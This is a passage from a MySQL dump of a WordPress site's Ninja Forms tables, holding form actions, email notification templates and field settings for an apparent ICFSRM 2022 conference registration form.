(62,4,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),
(63,4,'payment_gateways','','payment_gateways',''),
(64,4,'payment_total','','payment_total',''),
(65,4,'tag','','tag',''),
(66,4,'to','','to',''),
(67,4,'email_subject','','email_subject',''),
(68,4,'email_message','','email_message',''),
(69,4,'from_name','','from_name',''),
(70,4,'from_address','','from_address',''),
(71,4,'reply_to','','reply_to',''),
(72,4,'email_format','html','email_format','html'),
(73,4,'cc','','cc',''),
(74,4,'bcc','','bcc',''),
(75,4,'attach_csv','','attach_csv',''),
(76,4,'redirect_url','','redirect_url',''),
(77,4,'success_msg','<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>','success_msg','<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>'),
(78,4,'email_message_plain','','email_message_plain',''),
(79,5,'title','','title',''),
(80,5,'key','','key',''),
(81,5,'type','save','type','save'),
(82,5,'active','1','active','1'),
(83,5,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(84,5,'label','Record Submission','label','Record Submission'),
(85,5,'objectType','Action','objectType','Action'),
(86,5,'objectDomain','actions','objectDomain','actions'),
(87,5,'editActive','','editActive',''),
(88,5,'order','3','order','3'),
(89,5,'payment_gateways','','payment_gateways',''),
(90,5,'payment_total','0','payment_total','0'),
(91,5,'tag','','tag',''),
(92,5,'to','{wp:admin_email}','to','{wp:admin_email}'),
(93,5,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),
(94,5,'email_message','{fields_table}','email_message','{fields_table}'),
(95,5,'from_name','','from_name',''),
(96,5,'from_address','','from_address',''),
(97,5,'reply_to','','reply_to',''),
(98,5,'email_format','html','email_format','html'),
(99,5,'cc','','cc',''),
(100,5,'bcc','','bcc',''),
(101,5,'attach_csv','','attach_csv',''),
(102,5,'redirect_url','','redirect_url',''),
(103,5,'parent_id','2','parent_id','2'),
(104,5,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),
(105,5,'email_message_plain','','email_message_plain',''),
(106,5,'submitter_email','','submitter_email',''),
(107,5,'fields-save-toggle','save_all','fields-save-toggle','save_all'),
(108,5,'exception_fields','a:0:{}','exception_fields','a:0:{}'),
(109,5,'set_subs_to_expire','0','set_subs_to_expire','0'),
(110,5,'subs_expire_time','90','subs_expire_time','90'),
(111,6,'title','','title',''),
(112,6,'key','','key',''),
(113,6,'type','email','type','email'),
(114,6,'active','1','active','1'),
(115,6,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(116,6,'label','User Email Confirmation','label','User Email Confirmation'),
(117,6,'objectType','Action','objectType','Action'),
(118,6,'objectDomain','actions','objectDomain','actions'),
(119,6,'editActive','','editActive',''),
(120,6,'to','{field:email}','to','{field:email}'),
(121,6,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),
(122,6,'message','{all_fields_table}','message','{all_fields_table}'),
(123,6,'order','2','order','2'),
(124,6,'payment_gateways','','payment_gateways',''),
(125,6,'payment_total','0','payment_total','0'),
(126,6,'tag','','tag',''),
(127,6,'email_subject','Thank you for registering for our event','email_subject','Thank you for registering for our event'),
(128,6,'email_message','<p>Your registration details are below:</p><p>{all_fields_table}<br></p>','email_message','<p>Your registration details are below:</p><p>{all_fields_table}<br></p>'),
(129,6,'from_name','','from_name',''),
(130,6,'from_address','{system:admin_email}','from_address','{system:admin_email}'),
(131,6,'reply_to','','reply_to',''),
(132,6,'email_format','html','email_format','html'),
(133,6,'cc','','cc',''),
(134,6,'bcc','','bcc',''),
(135,6,'attach_csv','','attach_csv',''),
(136,6,'parent_id','2','parent_id','2'),
(137,6,'email_message_plain','','email_message_plain',''),
(138,7,'title','','title',''),
(139,7,'key','','key',''),
(140,7,'type','email','type','email'),
(141,7,'active','1','active','1'),
(142,7,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(143,7,'label','Admin Email Notification','label','Admin Email Notification'),
(144,7,'objectType','Action','objectType','Action'),
(145,7,'objectDomain','actions','objectDomain','actions'),
(146,7,'editActive','','editActive',''),
(147,7,'to','{system:admin_email}','to','{system:admin_email}'),
(148,7,'subject','Ninja Forms Submission','subject','Ninja Forms Submission'),
(149,7,'message','{all_fields_table}','message','{all_fields_table}'),
(150,7,'order','2','order','2'),
(151,7,'payment_gateways','','payment_gateways',''),
(152,7,'payment_total','0','payment_total','0'),
(153,7,'tag','','tag',''),
(154,7,'email_subject','New Event Registration from {field:firstname} {field:lastname}','email_subject','New Event Registration from {field:firstname} {field:lastname}'),
(155,7,'email_message','<p>Registration details are below:</p><p>{all_fields_table}<br></p>','email_message','<p>Registration details are below:</p><p>{all_fields_table}<br></p>'),
(156,7,'from_name','','from_name',''),
(157,7,'from_address','','from_address',''),
(158,7,'reply_to','{field:email}','reply_to','{field:email}'),
(159,7,'email_format','html','email_format','html'),
(160,7,'cc','','cc',''),
(161,7,'bcc','','bcc',''),
(162,7,'attach_csv','','attach_csv',''),
(163,7,'parent_id','2','parent_id','2'),
(164,7,'email_message_plain','','email_message_plain',''),
(165,8,'title','','title',''),
(166,8,'key','','key',''),
(167,8,'type','successmessage','type','successmessage'),
(168,8,'active','1','active','1'),
(169,8,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(170,8,'label','Success Message','label','Success Message'),
(171,8,'objectType','Action','objectType','Action'),
(172,8,'objectDomain','actions','objectDomain','actions'),
(173,8,'editActive','','editActive',''),
(174,8,'message','Your form has been successfully submitted.','message','Your form has been successfully submitted.'),
(175,8,'order','1','order','1'),
(176,8,'payment_gateways','','payment_gateways',''),
(177,8,'payment_total','0','payment_total','0'),
(178,8,'tag','','tag',''),
(179,8,'to','{wp:admin_email}','to','{wp:admin_email}'),
(180,8,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),
(181,8,'email_message','{fields_table}','email_message','{fields_table}'),
(182,8,'from_name','','from_name',''),
(183,8,'from_address','','from_address',''),
(184,8,'reply_to','','reply_to',''),
(185,8,'email_format','html','email_format','html'),
(186,8,'cc','','cc',''),
(187,8,'bcc','','bcc',''),
(188,8,'attach_csv','','attach_csv',''),
(189,8,'redirect_url','','redirect_url',''),
(190,8,'success_msg','<p>Thank you for registering for our event.</p>','success_msg','<p>Thank you for registering for our event.</p>'),
(191,8,'parent_id','2','parent_id','2'),
(192,8,'email_message_plain','','email_message_plain',''),
(193,8,'submitter_email','','submitter_email',''),
(194,8,'fields-save-toggle','save_all','fields-save-toggle','save_all'),
(195,8,'exception_fields','a:0:{}','exception_fields','a:0:{}'),
(196,8,'set_subs_to_expire','0','set_subs_to_expire','0'),
(197,8,'subs_expire_time','90','subs_expire_time','90'),
(198,5,'success_msg','Your form has been successfully submitted.','success_msg','Your form has been successfully submitted.'),
(199,5,'drawerDisabled','','drawerDisabled','');
/*!40000 ALTER TABLE `dnctiavkr_nf3_action_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_nf3_actions`
--

DROP TABLE IF EXISTS `dnctiavkr_nf3_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_nf3_actions` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` longtext DEFAULT NULL,
  `key` longtext DEFAULT NULL,
  `type` longtext DEFAULT NULL,
  `active` tinyint(1) DEFAULT 1,
  `parent_id` int(11) NOT NULL,
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `updated_at` datetime DEFAULT NULL,
  `label` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_nf3_actions`
--

LOCK TABLES `dnctiavkr_nf3_actions` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_nf3_actions` DISABLE KEYS */;
INSERT INTO `dnctiavkr_nf3_actions` VALUES
(1,'','','save',1,1,'2022-11-12 14:03:55','2022-11-12 14:03:55','Record Submission'),
(2,'','','email',1,1,'2022-11-12 14:03:55','2022-11-12 14:03:55','Email Confirmation'),
(3,'','','email',1,1,'2022-11-12 14:03:55','2022-11-12 14:03:55','Email Notification'),
(4,'','','successmessage',1,1,'2022-11-12 14:03:55','2022-11-12 14:03:55','Success Message'),
(5,'','','save',1,2,'2016-08-28 20:16:05',NULL,'Record Submission'),
(6,'','','email',1,2,'2016-08-28 20:16:05',NULL,'User Email Confirmation'),
(7,'','','email',1,2,'2016-08-28 20:16:05',NULL,'Admin Email Notification'),
(8,'','','successmessage',1,2,'2016-08-28 20:16:05',NULL,'Success Message');
/*!40000 ALTER TABLE `dnctiavkr_nf3_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_nf3_chunks`
--

DROP TABLE IF EXISTS `dnctiavkr_nf3_chunks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_nf3_chunks` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(200) DEFAULT NULL,
  `value` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_nf3_chunks`
--

LOCK TABLES `dnctiavkr_nf3_chunks` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_nf3_chunks` DISABLE KEYS */;
/*!40000 ALTER TABLE `dnctiavkr_nf3_chunks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `dnctiavkr_nf3_field_meta`
--

DROP TABLE IF EXISTS `dnctiavkr_nf3_field_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `dnctiavkr_nf3_field_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext DEFAULT NULL,
  `meta_key` longtext DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=512 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `dnctiavkr_nf3_field_meta`
--

LOCK TABLES `dnctiavkr_nf3_field_meta` WRITE;
/*!40000 ALTER TABLE `dnctiavkr_nf3_field_meta` DISABLE KEYS */;
INSERT INTO `dnctiavkr_nf3_field_meta` VALUES
(1,1,'label_pos','above','label_pos','above'),
(2,1,'required','1','required','1'),
(3,1,'order','1','order','1'),
(4,1,'placeholder','','placeholder',''),
(5,1,'default','','default',''),
(6,1,'wrapper_class','','wrapper_class',''),
(7,1,'element_class','','element_class',''),
(8,1,'objectType','Field','objectType','Field'),
(9,1,'objectDomain','fields','objectDomain','fields'),
(10,1,'editActive','','editActive',''),
(11,1,'container_class','','container_class',''),
(12,1,'input_limit','','input_limit',''),
(13,1,'input_limit_type','characters','input_limit_type','characters'),
(14,1,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),
(15,1,'manual_key','','manual_key',''),
(16,1,'disable_input','','disable_input',''),
(17,1,'admin_label','','admin_label',''),
(18,1,'help_text','','help_text',''),
(19,1,'desc_text','','desc_text',''),
(20,1,'disable_browser_autocomplete','','disable_browser_autocomplete',''),
(21,1,'mask','','mask',''),
(22,1,'custom_mask','','custom_mask',''),
(23,1,'wrap_styles_background-color','','wrap_styles_background-color',''),
(24,1,'wrap_styles_border','','wrap_styles_border',''),
(25,1,'wrap_styles_border-style','','wrap_styles_border-style',''),
(26,1,'wrap_styles_border-color','','wrap_styles_border-color',''),
(27,1,'wrap_styles_color','','wrap_styles_color',''),
(28,1,'wrap_styles_height','','wrap_styles_height',''),
(29,1,'wrap_styles_width','','wrap_styles_width',''),
(30,1,'wrap_styles_font-size','','wrap_styles_font-size',''),
(31,1,'wrap_styles_margin','','wrap_styles_margin',''),
(32,1,'wrap_styles_padding','','wrap_styles_padding',''),
(33,1,'wrap_styles_display','','wrap_styles_display',''),
(34,1,'wrap_styles_float','','wrap_styles_float',''),
(35,1,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),
(36,1,'wrap_styles_advanced','','wrap_styles_advanced',''),
(37,1,'label_styles_background-color','','label_styles_background-color',''),
(38,1,'label_styles_border','','label_styles_border',''),
(39,1,'label_styles_border-style','','label_styles_border-style',''),
(40,1,'label_styles_border-color','','label_styles_border-color',''),
(41,1,'label_styles_color','','label_styles_color',''),
(42,1,'label_styles_height','','label_styles_height',''),
(43,1,'label_styles_width','','label_styles_width',''),
(44,1,'label_styles_font-size','','label_styles_font-size',''),
(45,1,'label_styles_margin','','label_styles_margin',''),
(46,1,'label_styles_padding','','label_styles_padding',''),
(47,1,'label_styles_display','','label_styles_display',''),
(48,1,'label_styles_float','','label_styles_float',''),
(49,1,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),
(50,1,'label_styles_advanced','','label_styles_advanced',''),
(51,1,'element_styles_background-color','','element_styles_background-color',''),
(52,1,'element_styles_border','','element_styles_border',''),
(53,1,'element_styles_border-style','','element_styles_border-style',''),
(54,1,'element_styles_border-color','','element_styles_border-color',''),
(55,1,'element_styles_color','','element_styles_color',''),
(56,1,'element_styles_height','','element_styles_height',''),
(57,1,'element_styles_width','','element_styles_width',''),
(58,1,'element_styles_font-size','','element_styles_font-size',''),
(59,1,'element_styles_margin','','element_styles_margin',''),
(60,1,'element_styles_padding','','element_styles_padding',''),
(61,1,'element_styles_display','','element_styles_display',''),
(62,1,'element_styles_float','','element_styles_float',''),
(63,1,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),
(64,1,'element_styles_advanced','','element_styles_advanced',''),
(65,1,'cellcid','c3277','cellcid','c3277'),
(66,2,'label_pos','above','label_pos','above'),
(67,2,'required','1','required','1'),
(68,2,'order','2','order','2'),
(69,2,'placeholder','','placeholder',''),
(70,2,'default','','default',''),
(71,2,'wrapper_class','','wrapper_class',''),
(72,2,'element_class','','element_class',''),
(73,2,'objectType','Field','objectType','Field'),
(74,2,'objectDomain','fields','objectDomain','fields'),
(75,2,'editActive','','editActive',''),
(76,2,'container_class','','container_class',''),
(77,2,'admin_label','','admin_label',''),
(78,2,'help_text','','help_text',''),
(79,2,'desc_text','','desc_text',''),
(80,2,'wrap_styles_background-color','','wrap_styles_background-color',''),
(81,2,'wrap_styles_border','','wrap_styles_border',''),
(82,2,'wrap_styles_border-style','','wrap_styles_border-style',''),
(83,2,'wrap_styles_border-color','','wrap_styles_border-color',''),
(84,2,'wrap_styles_color','','wrap_styles_color',''),
(85,2,'wrap_styles_height','','wrap_styles_height',''),
(86,2,'wrap_styles_width','','wrap_styles_width',''),
(87,2,'wrap_styles_font-size','','wrap_styles_font-size',''),
(88,2,'wrap_styles_margin','','wrap_styles_margin',''),
(89,2,'wrap_styles_padding','','wrap_styles_padding',''),
(90,2,'wrap_styles_display','','wrap_styles_display',''),
(91,2,'wrap_styles_float','','wrap_styles_float',''),
(92,2,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),
(93,2,'wrap_styles_advanced','','wrap_styles_advanced',''),
(94,2,'label_styles_background-color','','label_styles_background-color',''),
(95,2,'label_styles_border','','label_styles_border',''),
(96,2,'label_styles_border-style','','label_styles_border-style',''),
(97,2,'label_styles_border-color','','label_styles_border-color',''),
(98,2,'label_styles_color','','label_styles_color',''),
(99,2,'label_styles_height','','label_styles_height',''),
(100,2,'label_styles_width','','label_styles_width',''),
(101,2,'label_styles_font-size','','label_styles_font-size',''),
(102,2,'label_styles_margin','','label_styles_margin',''),
(103,2,'label_styles_padding','','label_styles_padding',''),
(104,2,'label_styles_display','','label_styles_display',''),
(105,2,'label_styles_float','','label_styles_float',''),
(106,2,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),
(107,2,'label_styles_advanced','','label_styles_advanced',''),
(108,2,'element_styles_background-color','','element_styles_background-color',''),
(109,2,'element_styles_border','','element_styles_border',''),
(110,2,'element_styles_border-style','','element_styles_border-style',''),
(111,2,'element_styles_border-color','','element_styles_border-color',''),
(112,2,'element_styles_color','','element_styles_color',''),
(113,2,'element_styles_height','','element_styles_height',''),
(114,2,'element_styles_width','','element_styles_width',''),
(115,2,'element_styles_font-size','','element_styles_font-size',''),
(116,2,'element_styles_margin','','element_styles_margin',''),
(117,2,'element_styles_padding','','element_styles_padding',''),
(118,2,'element_styles_display','','element_styles_display',''),
(119,2,'element_styles_float','','element_styles_float',''),
(120,2,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),
(121,2,'element_styles_advanced','','element_styles_advanced',''),
(122,2,'cellcid','c3281','cellcid','c3281'),
(123,3,'label_pos','above','label_pos','above'),
(124,3,'required','1','required','1'),
(125,3,'order','3','order','3'),
(126,3,'placeholder','','placeholder',''),
(127,3,'default','','default',''),
(128,3,'wrapper_class','','wrapper_class',''),
(129,3,'element_class','','element_class',''),
(130,3,'objectType','Field','objectType','Field'),
(131,3,'objectDomain','fields','objectDomain','fields'),
(132,3,'editActive','','editActive',''),
(133,3,'container_class','','container_class',''),
(134,3,'input_limit','','input_limit',''),
(135,3,'input_limit_type','characters','input_limit_type','characters'),
(136,3,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),
(137,3,'manual_key','','manual_key',''),
(138,3,'disable_input','','disable_input',''),
(139,3,'admin_label','','admin_label',''),
(140,3,'help_text','','help_text',''),
(141,3,'desc_text','','desc_text',''),
(142,3,'disable_browser_autocomplete','','disable_browser_autocomplete',''),
(143,3,'textarea_rte','','textarea_rte',''),
(144,3,'disable_rte_mobile','','disable_rte_mobile',''),
(145,3,'textarea_media','','textarea_media',''),
(146,3,'wrap_styles_background-color','','wrap_styles_background-color',''),
(147,3,'wrap_styles_border','','wrap_styles_border',''),
(148,3,'wrap_styles_border-style','','wrap_styles_border-style',''),
(149,3,'wrap_styles_border-color','','wrap_styles_border-color',''),
(150,3,'wrap_styles_color','','wrap_styles_color',''),
(151,3,'wrap_styles_height','','wrap_styles_height',''),
(152,3,'wrap_styles_width','','wrap_styles_width',''),
(153,3,'wrap_styles_font-size','','wrap_styles_font-size',''),
(154,3,'wrap_styles_margin','','wrap_styles_margin',''),
(155,3,'wrap_styles_padding','','wrap_styles_padding',''),
(156,3,'wrap_styles_display','','wrap_styles_display',''),
(157,3,'wrap_styles_float','','wrap_styles_float',''),
(158,3,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),
(159,3,'wrap_styles_advanced','','wrap_styles_advanced',''),
(160,3,'label_styles_background-color','','label_styles_background-color',''),
(161,3,'label_styles_border','','label_styles_border',''),
(162,3,'label_styles_border-style','','label_styles_border-style',''),
(163,3,'label_styles_border-color','','label_styles_border-color',''),
(164,3,'label_styles_color','','label_styles_color',''),
(165,3,'label_styles_height','','label_styles_height',''),
(166,3,'label_styles_width','','label_styles_width',''),
(167,3,'label_styles_font-size','','label_styles_font-size',''),
(168,3,'label_styles_margin','','label_styles_margin',''),
(169,3,'label_styles_padding','','label_styles_padding',''),
(170,3,'label_styles_display','','label_styles_display',''),
(171,3,'label_styles_float','','label_styles_float',''),
(172,3,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),
(173,3,'label_styles_advanced','','label_styles_advanced',''),
(174,3,'element_styles_background-color','','element_styles_background-color',''),
(175,3,'element_styles_border','','element_styles_border',''),
(176,3,'element_styles_border-style','','element_styles_border-style',''),
(177,3,'element_styles_border-color','','element_styles_border-color',''),
(178,3,'element_styles_color','','element_styles_color',''),
(179,3,'element_styles_height','','element_styles_height',''),
(180,3,'element_styles_width','','element_styles_width',''),
(181,3,'element_styles_font-size','','element_styles_font-size',''),
(182,3,'element_styles_margin','','element_styles_margin',''),
(183,3,'element_styles_padding','','element_styles_padding',''),
(184,3,'element_styles_display','','element_styles_display',''),
(185,3,'element_styles_float','','element_styles_float',''),
(186,3,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),
(187,3,'element_styles_advanced','','element_styles_advanced',''),
(188,3,'cellcid','c3284','cellcid','c3284'),
(189,4,'processing_label','Processing','processing_label','Processing'),
(190,4,'order','5','order','5'),
(191,4,'objectType','Field','objectType','Field'),
(192,4,'objectDomain','fields','objectDomain','fields'),
(193,4,'editActive','','editActive',''),
(194,4,'container_class','','container_class',''),
(195,4,'element_class','','element_class',''),
(196,4,'wrap_styles_background-color','','wrap_styles_background-color',''),
(197,4,'wrap_styles_border','','wrap_styles_border',''),
(198,4,'wrap_styles_border-style','','wrap_styles_border-style',''),
(199,4,'wrap_styles_border-color','','wrap_styles_border-color',''),
(200,4,'wrap_styles_color','','wrap_styles_color',''),
(201,4,'wrap_styles_height','','wrap_styles_height',''),
(202,4,'wrap_styles_width','','wrap_styles_width',''),
(203,4,'wrap_styles_font-size','','wrap_styles_font-size',''),
(204,4,'wrap_styles_margin','','wrap_styles_margin',''),
(205,4,'wrap_styles_padding','','wrap_styles_padding',''),
(206,4,'wrap_styles_display','','wrap_styles_display',''),
(207,4,'wrap_styles_float','','wrap_styles_float',''),
(208,4,'wrap_styles_show_advanced_css','0','wrap_styles_show_advanced_css','0'),
(209,4,'wrap_styles_advanced','','wrap_styles_advanced',''),
(210,4,'label_styles_background-color','','label_styles_background-color',''),
(211,4,'label_styles_border','','label_styles_border',''),
(212,4,'label_styles_border-style','','label_styles_border-style',''),
(213,4,'label_styles_border-color','','label_styles_border-color',''),
(214,4,'label_styles_color','','label_styles_color',''),
(215,4,'label_styles_height','','label_styles_height',''),
(216,4,'label_styles_width','','label_styles_width',''),
(217,4,'label_styles_font-size','','label_styles_font-size',''),
(218,4,'label_styles_margin','','label_styles_margin',''),
(219,4,'label_styles_padding','','label_styles_padding',''),
(220,4,'label_styles_display','','label_styles_display',''),
(221,4,'label_styles_float','','label_styles_float',''),
(222,4,'label_styles_show_advanced_css','0','label_styles_show_advanced_css','0'),
(223,4,'label_styles_advanced','','label_styles_advanced',''),
(224,4,'element_styles_background-color','','element_styles_background-color',''),
(225,4,'element_styles_border','','element_styles_border',''),
(226,4,'element_styles_border-style','','element_styles_border-style',''),
(227,4,'element_styles_border-color','','element_styles_border-color',''),
(228,4,'element_styles_color','','element_styles_color',''),
(229,4,'element_styles_height','','element_styles_height',''),
(230,4,'element_styles_width','','element_styles_width',''),
(231,4,'element_styles_font-size','','element_styles_font-size',''),
(232,4,'element_styles_margin','','element_styles_margin',''),
(233,4,'element_styles_padding','','element_styles_padding',''),
(234,4,'element_styles_display','','element_styles_display',''),
(235,4,'element_styles_float','','element_styles_float',''),
(236,4,'element_styles_show_advanced_css','0','element_styles_show_advanced_css','0'),
(237,4,'element_styles_advanced','','element_styles_advanced',''),
(238,4,'submit_element_hover_styles_background-color','','submit_element_hover_styles_background-color',''),
(239,4,'submit_element_hover_styles_border','','submit_element_hover_styles_border',''),
(240,4,'submit_element_hover_styles_border-style','','submit_element_hover_styles_border-style',''),
(241,4,'submit_element_hover_styles_border-color','','submit_element_hover_styles_border-color',''),
(242,4,'submit_element_hover_styles_color','','submit_element_hover_styles_color',''),
(243,4,'submit_element_hover_styles_height','','submit_element_hover_styles_height',''),
(244,4,'submit_element_hover_styles_width','','submit_element_hover_styles_width',''),
(245,4,'submit_element_hover_styles_font-size','','submit_element_hover_styles_font-size',''),
(246,4,'submit_element_hover_styles_margin','','submit_element_hover_styles_margin',''),
(247,4,'submit_element_hover_styles_padding','','submit_element_hover_styles_padding',''),
(248,4,'submit_element_hover_styles_display','','submit_element_hover_styles_display',''),
(249,4,'submit_element_hover_styles_float','','submit_element_hover_styles_float',''),
(250,4,'submit_element_hover_styles_show_advanced_css','0','submit_element_hover_styles_show_advanced_css','0'),
(251,4,'submit_element_hover_styles_advanced','','submit_element_hover_styles_advanced',''),
(252,4,'cellcid','c3287','cellcid','c3287'),
(253,1,'field_label','Name','field_label','Name'),
(254,1,'field_key','name','field_key','name'),
(255,2,'field_label','Email','field_label','Email'),
(256,2,'field_key','email','field_key','email'),
(257,3,'field_label','Message','field_label','Message'),
(258,3,'field_key','message','field_key','message'),
(259,4,'field_label','Submit','field_label','Submit'),
(260,4,'field_key','submit','field_key','submit'),
(261,5,'objectType','Field','objectType','Field'),
(262,5,'objectDomain','fields','objectDomain','fields'),
(263,5,'editActive','','editActive',''),
(264,5,'order','1','order','1'),
(265,5,'label','ICFSRM 2022 Conference is \" Climate change, challenges and threats \"','label','ICFSRM 2022 Conference is \" Climate change, challenges and threats \"'),
(266,5,'key','icfsrm_2022_conference_is_climate_change_challenges_and_threats_1668262317133','key','icfsrm_2022_conference_is_climate_change_challenges_and_threats_1668262317133'),
(267,5,'type','html','type','html'),
(268,5,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(269,5,'default','<p><br></p>','default','<p><br></p>'),
(270,5,'container_class','','container_class',''),
(271,5,'element_class','','element_class',''),
(272,5,'field_label','Event Intro Description','field_label','Event Intro Description'),
(273,5,'field_key','event_intro_description','field_key','event_intro_description'),
(274,5,'parent_id','2','parent_id','2'),
(275,6,'objectType','Field','objectType','Field'),
(276,6,'objectDomain','fields','objectDomain','fields'),
(277,6,'editActive','','editActive',''),
(278,6,'order','2','order','2'),
(279,6,'label','Divider','label','Divider'),
(280,6,'key','hr','key','hr'),
(281,6,'type','hr','type','hr'),
(282,6,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(283,6,'container_class','','container_class',''),
(284,6,'element_class','','element_class',''),
(285,6,'field_label','Divider','field_label','Divider'),
(286,6,'field_key','hr','field_key','hr'),
(287,6,'parent_id','2','parent_id','2'),
(288,7,'objectType','Field','objectType','Field'),
(289,7,'objectDomain','fields','objectDomain','fields'),
(290,7,'editActive','','editActive',''),
(291,7,'order','3','order','3'),
(292,7,'label','First Name','label','First Name'),
(293,7,'key','firstname','key','firstname'),
(294,7,'type','firstname','type','firstname'),
(295,7,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(296,7,'label_pos','default','label_pos','default'),
(297,7,'required','1','required','1'),
(298,7,'default','','default',''),
(299,7,'placeholder','','placeholder',''),
(300,7,'container_class','one-half first','container_class','one-half first'),
(301,7,'element_class','','element_class',''),
(302,7,'admin_label','','admin_label',''),
(303,7,'help_text','','help_text',''),
(304,7,'desc_text','','desc_text',''),
(305,7,'field_label','First Name','field_label','First Name'),
(306,7,'field_key','firstname','field_key','firstname'),
(307,7,'custom_name_attribute','fname','custom_name_attribute','fname'),
(308,7,'personally_identifiable','1','personally_identifiable','1'),
(309,7,'value','','value',''),
(310,7,'parent_id','2','parent_id','2'),
(311,8,'objectType','Field','objectType','Field'),
(312,8,'objectDomain','fields','objectDomain','fields'),
(313,8,'editActive','','editActive',''),
(314,8,'order','4','order','4'),
(315,8,'label','Last Name','label','Last Name'),
(316,8,'key','lastname','key','lastname'),
(317,8,'type','lastname','type','lastname'),
(318,8,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
(319,8,'label_pos','default','label_pos','default'),
(320,8,'required','1','required','1'),
(321,8,'default','','default',''),
(322,8,'placeholder','','placeholder',''),
(323,8,'container_class','one-half','container_class','one-half'),
(324,8,'element_class','','element_class',''),
(325,8,'admin_label','','admin_label',''),
(326,8,'help_text','','help_text',''),
(327,8,'desc_text','','desc_text',''),
(328,8,'field_label','Last Name','field_label','Last Name'),
(329,8,'field_key','lastname','field_key','lastname'),
(330,8,'custom_name_attribute','lname','custom_name_attribute','lname'),
(331,8,'personally_identifiable','1','personally_identifiable','1'),
(332,8,'value','','value',''),
(333,8,'parent_id','2','parent_id','2'),
(334,9,'objectType','Field','objectType','Field'),
(335,9,'objectDomain','fields','objectDomain','fields'),
(336,9,'editActive','','editActive',''),
(337,9,'order','5','order','5'),
(338,9,'label','Email','label','Email'),
(339,9,'key','email','key','email'),
(340,9,'type','email','type','email'),
(341,9,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),
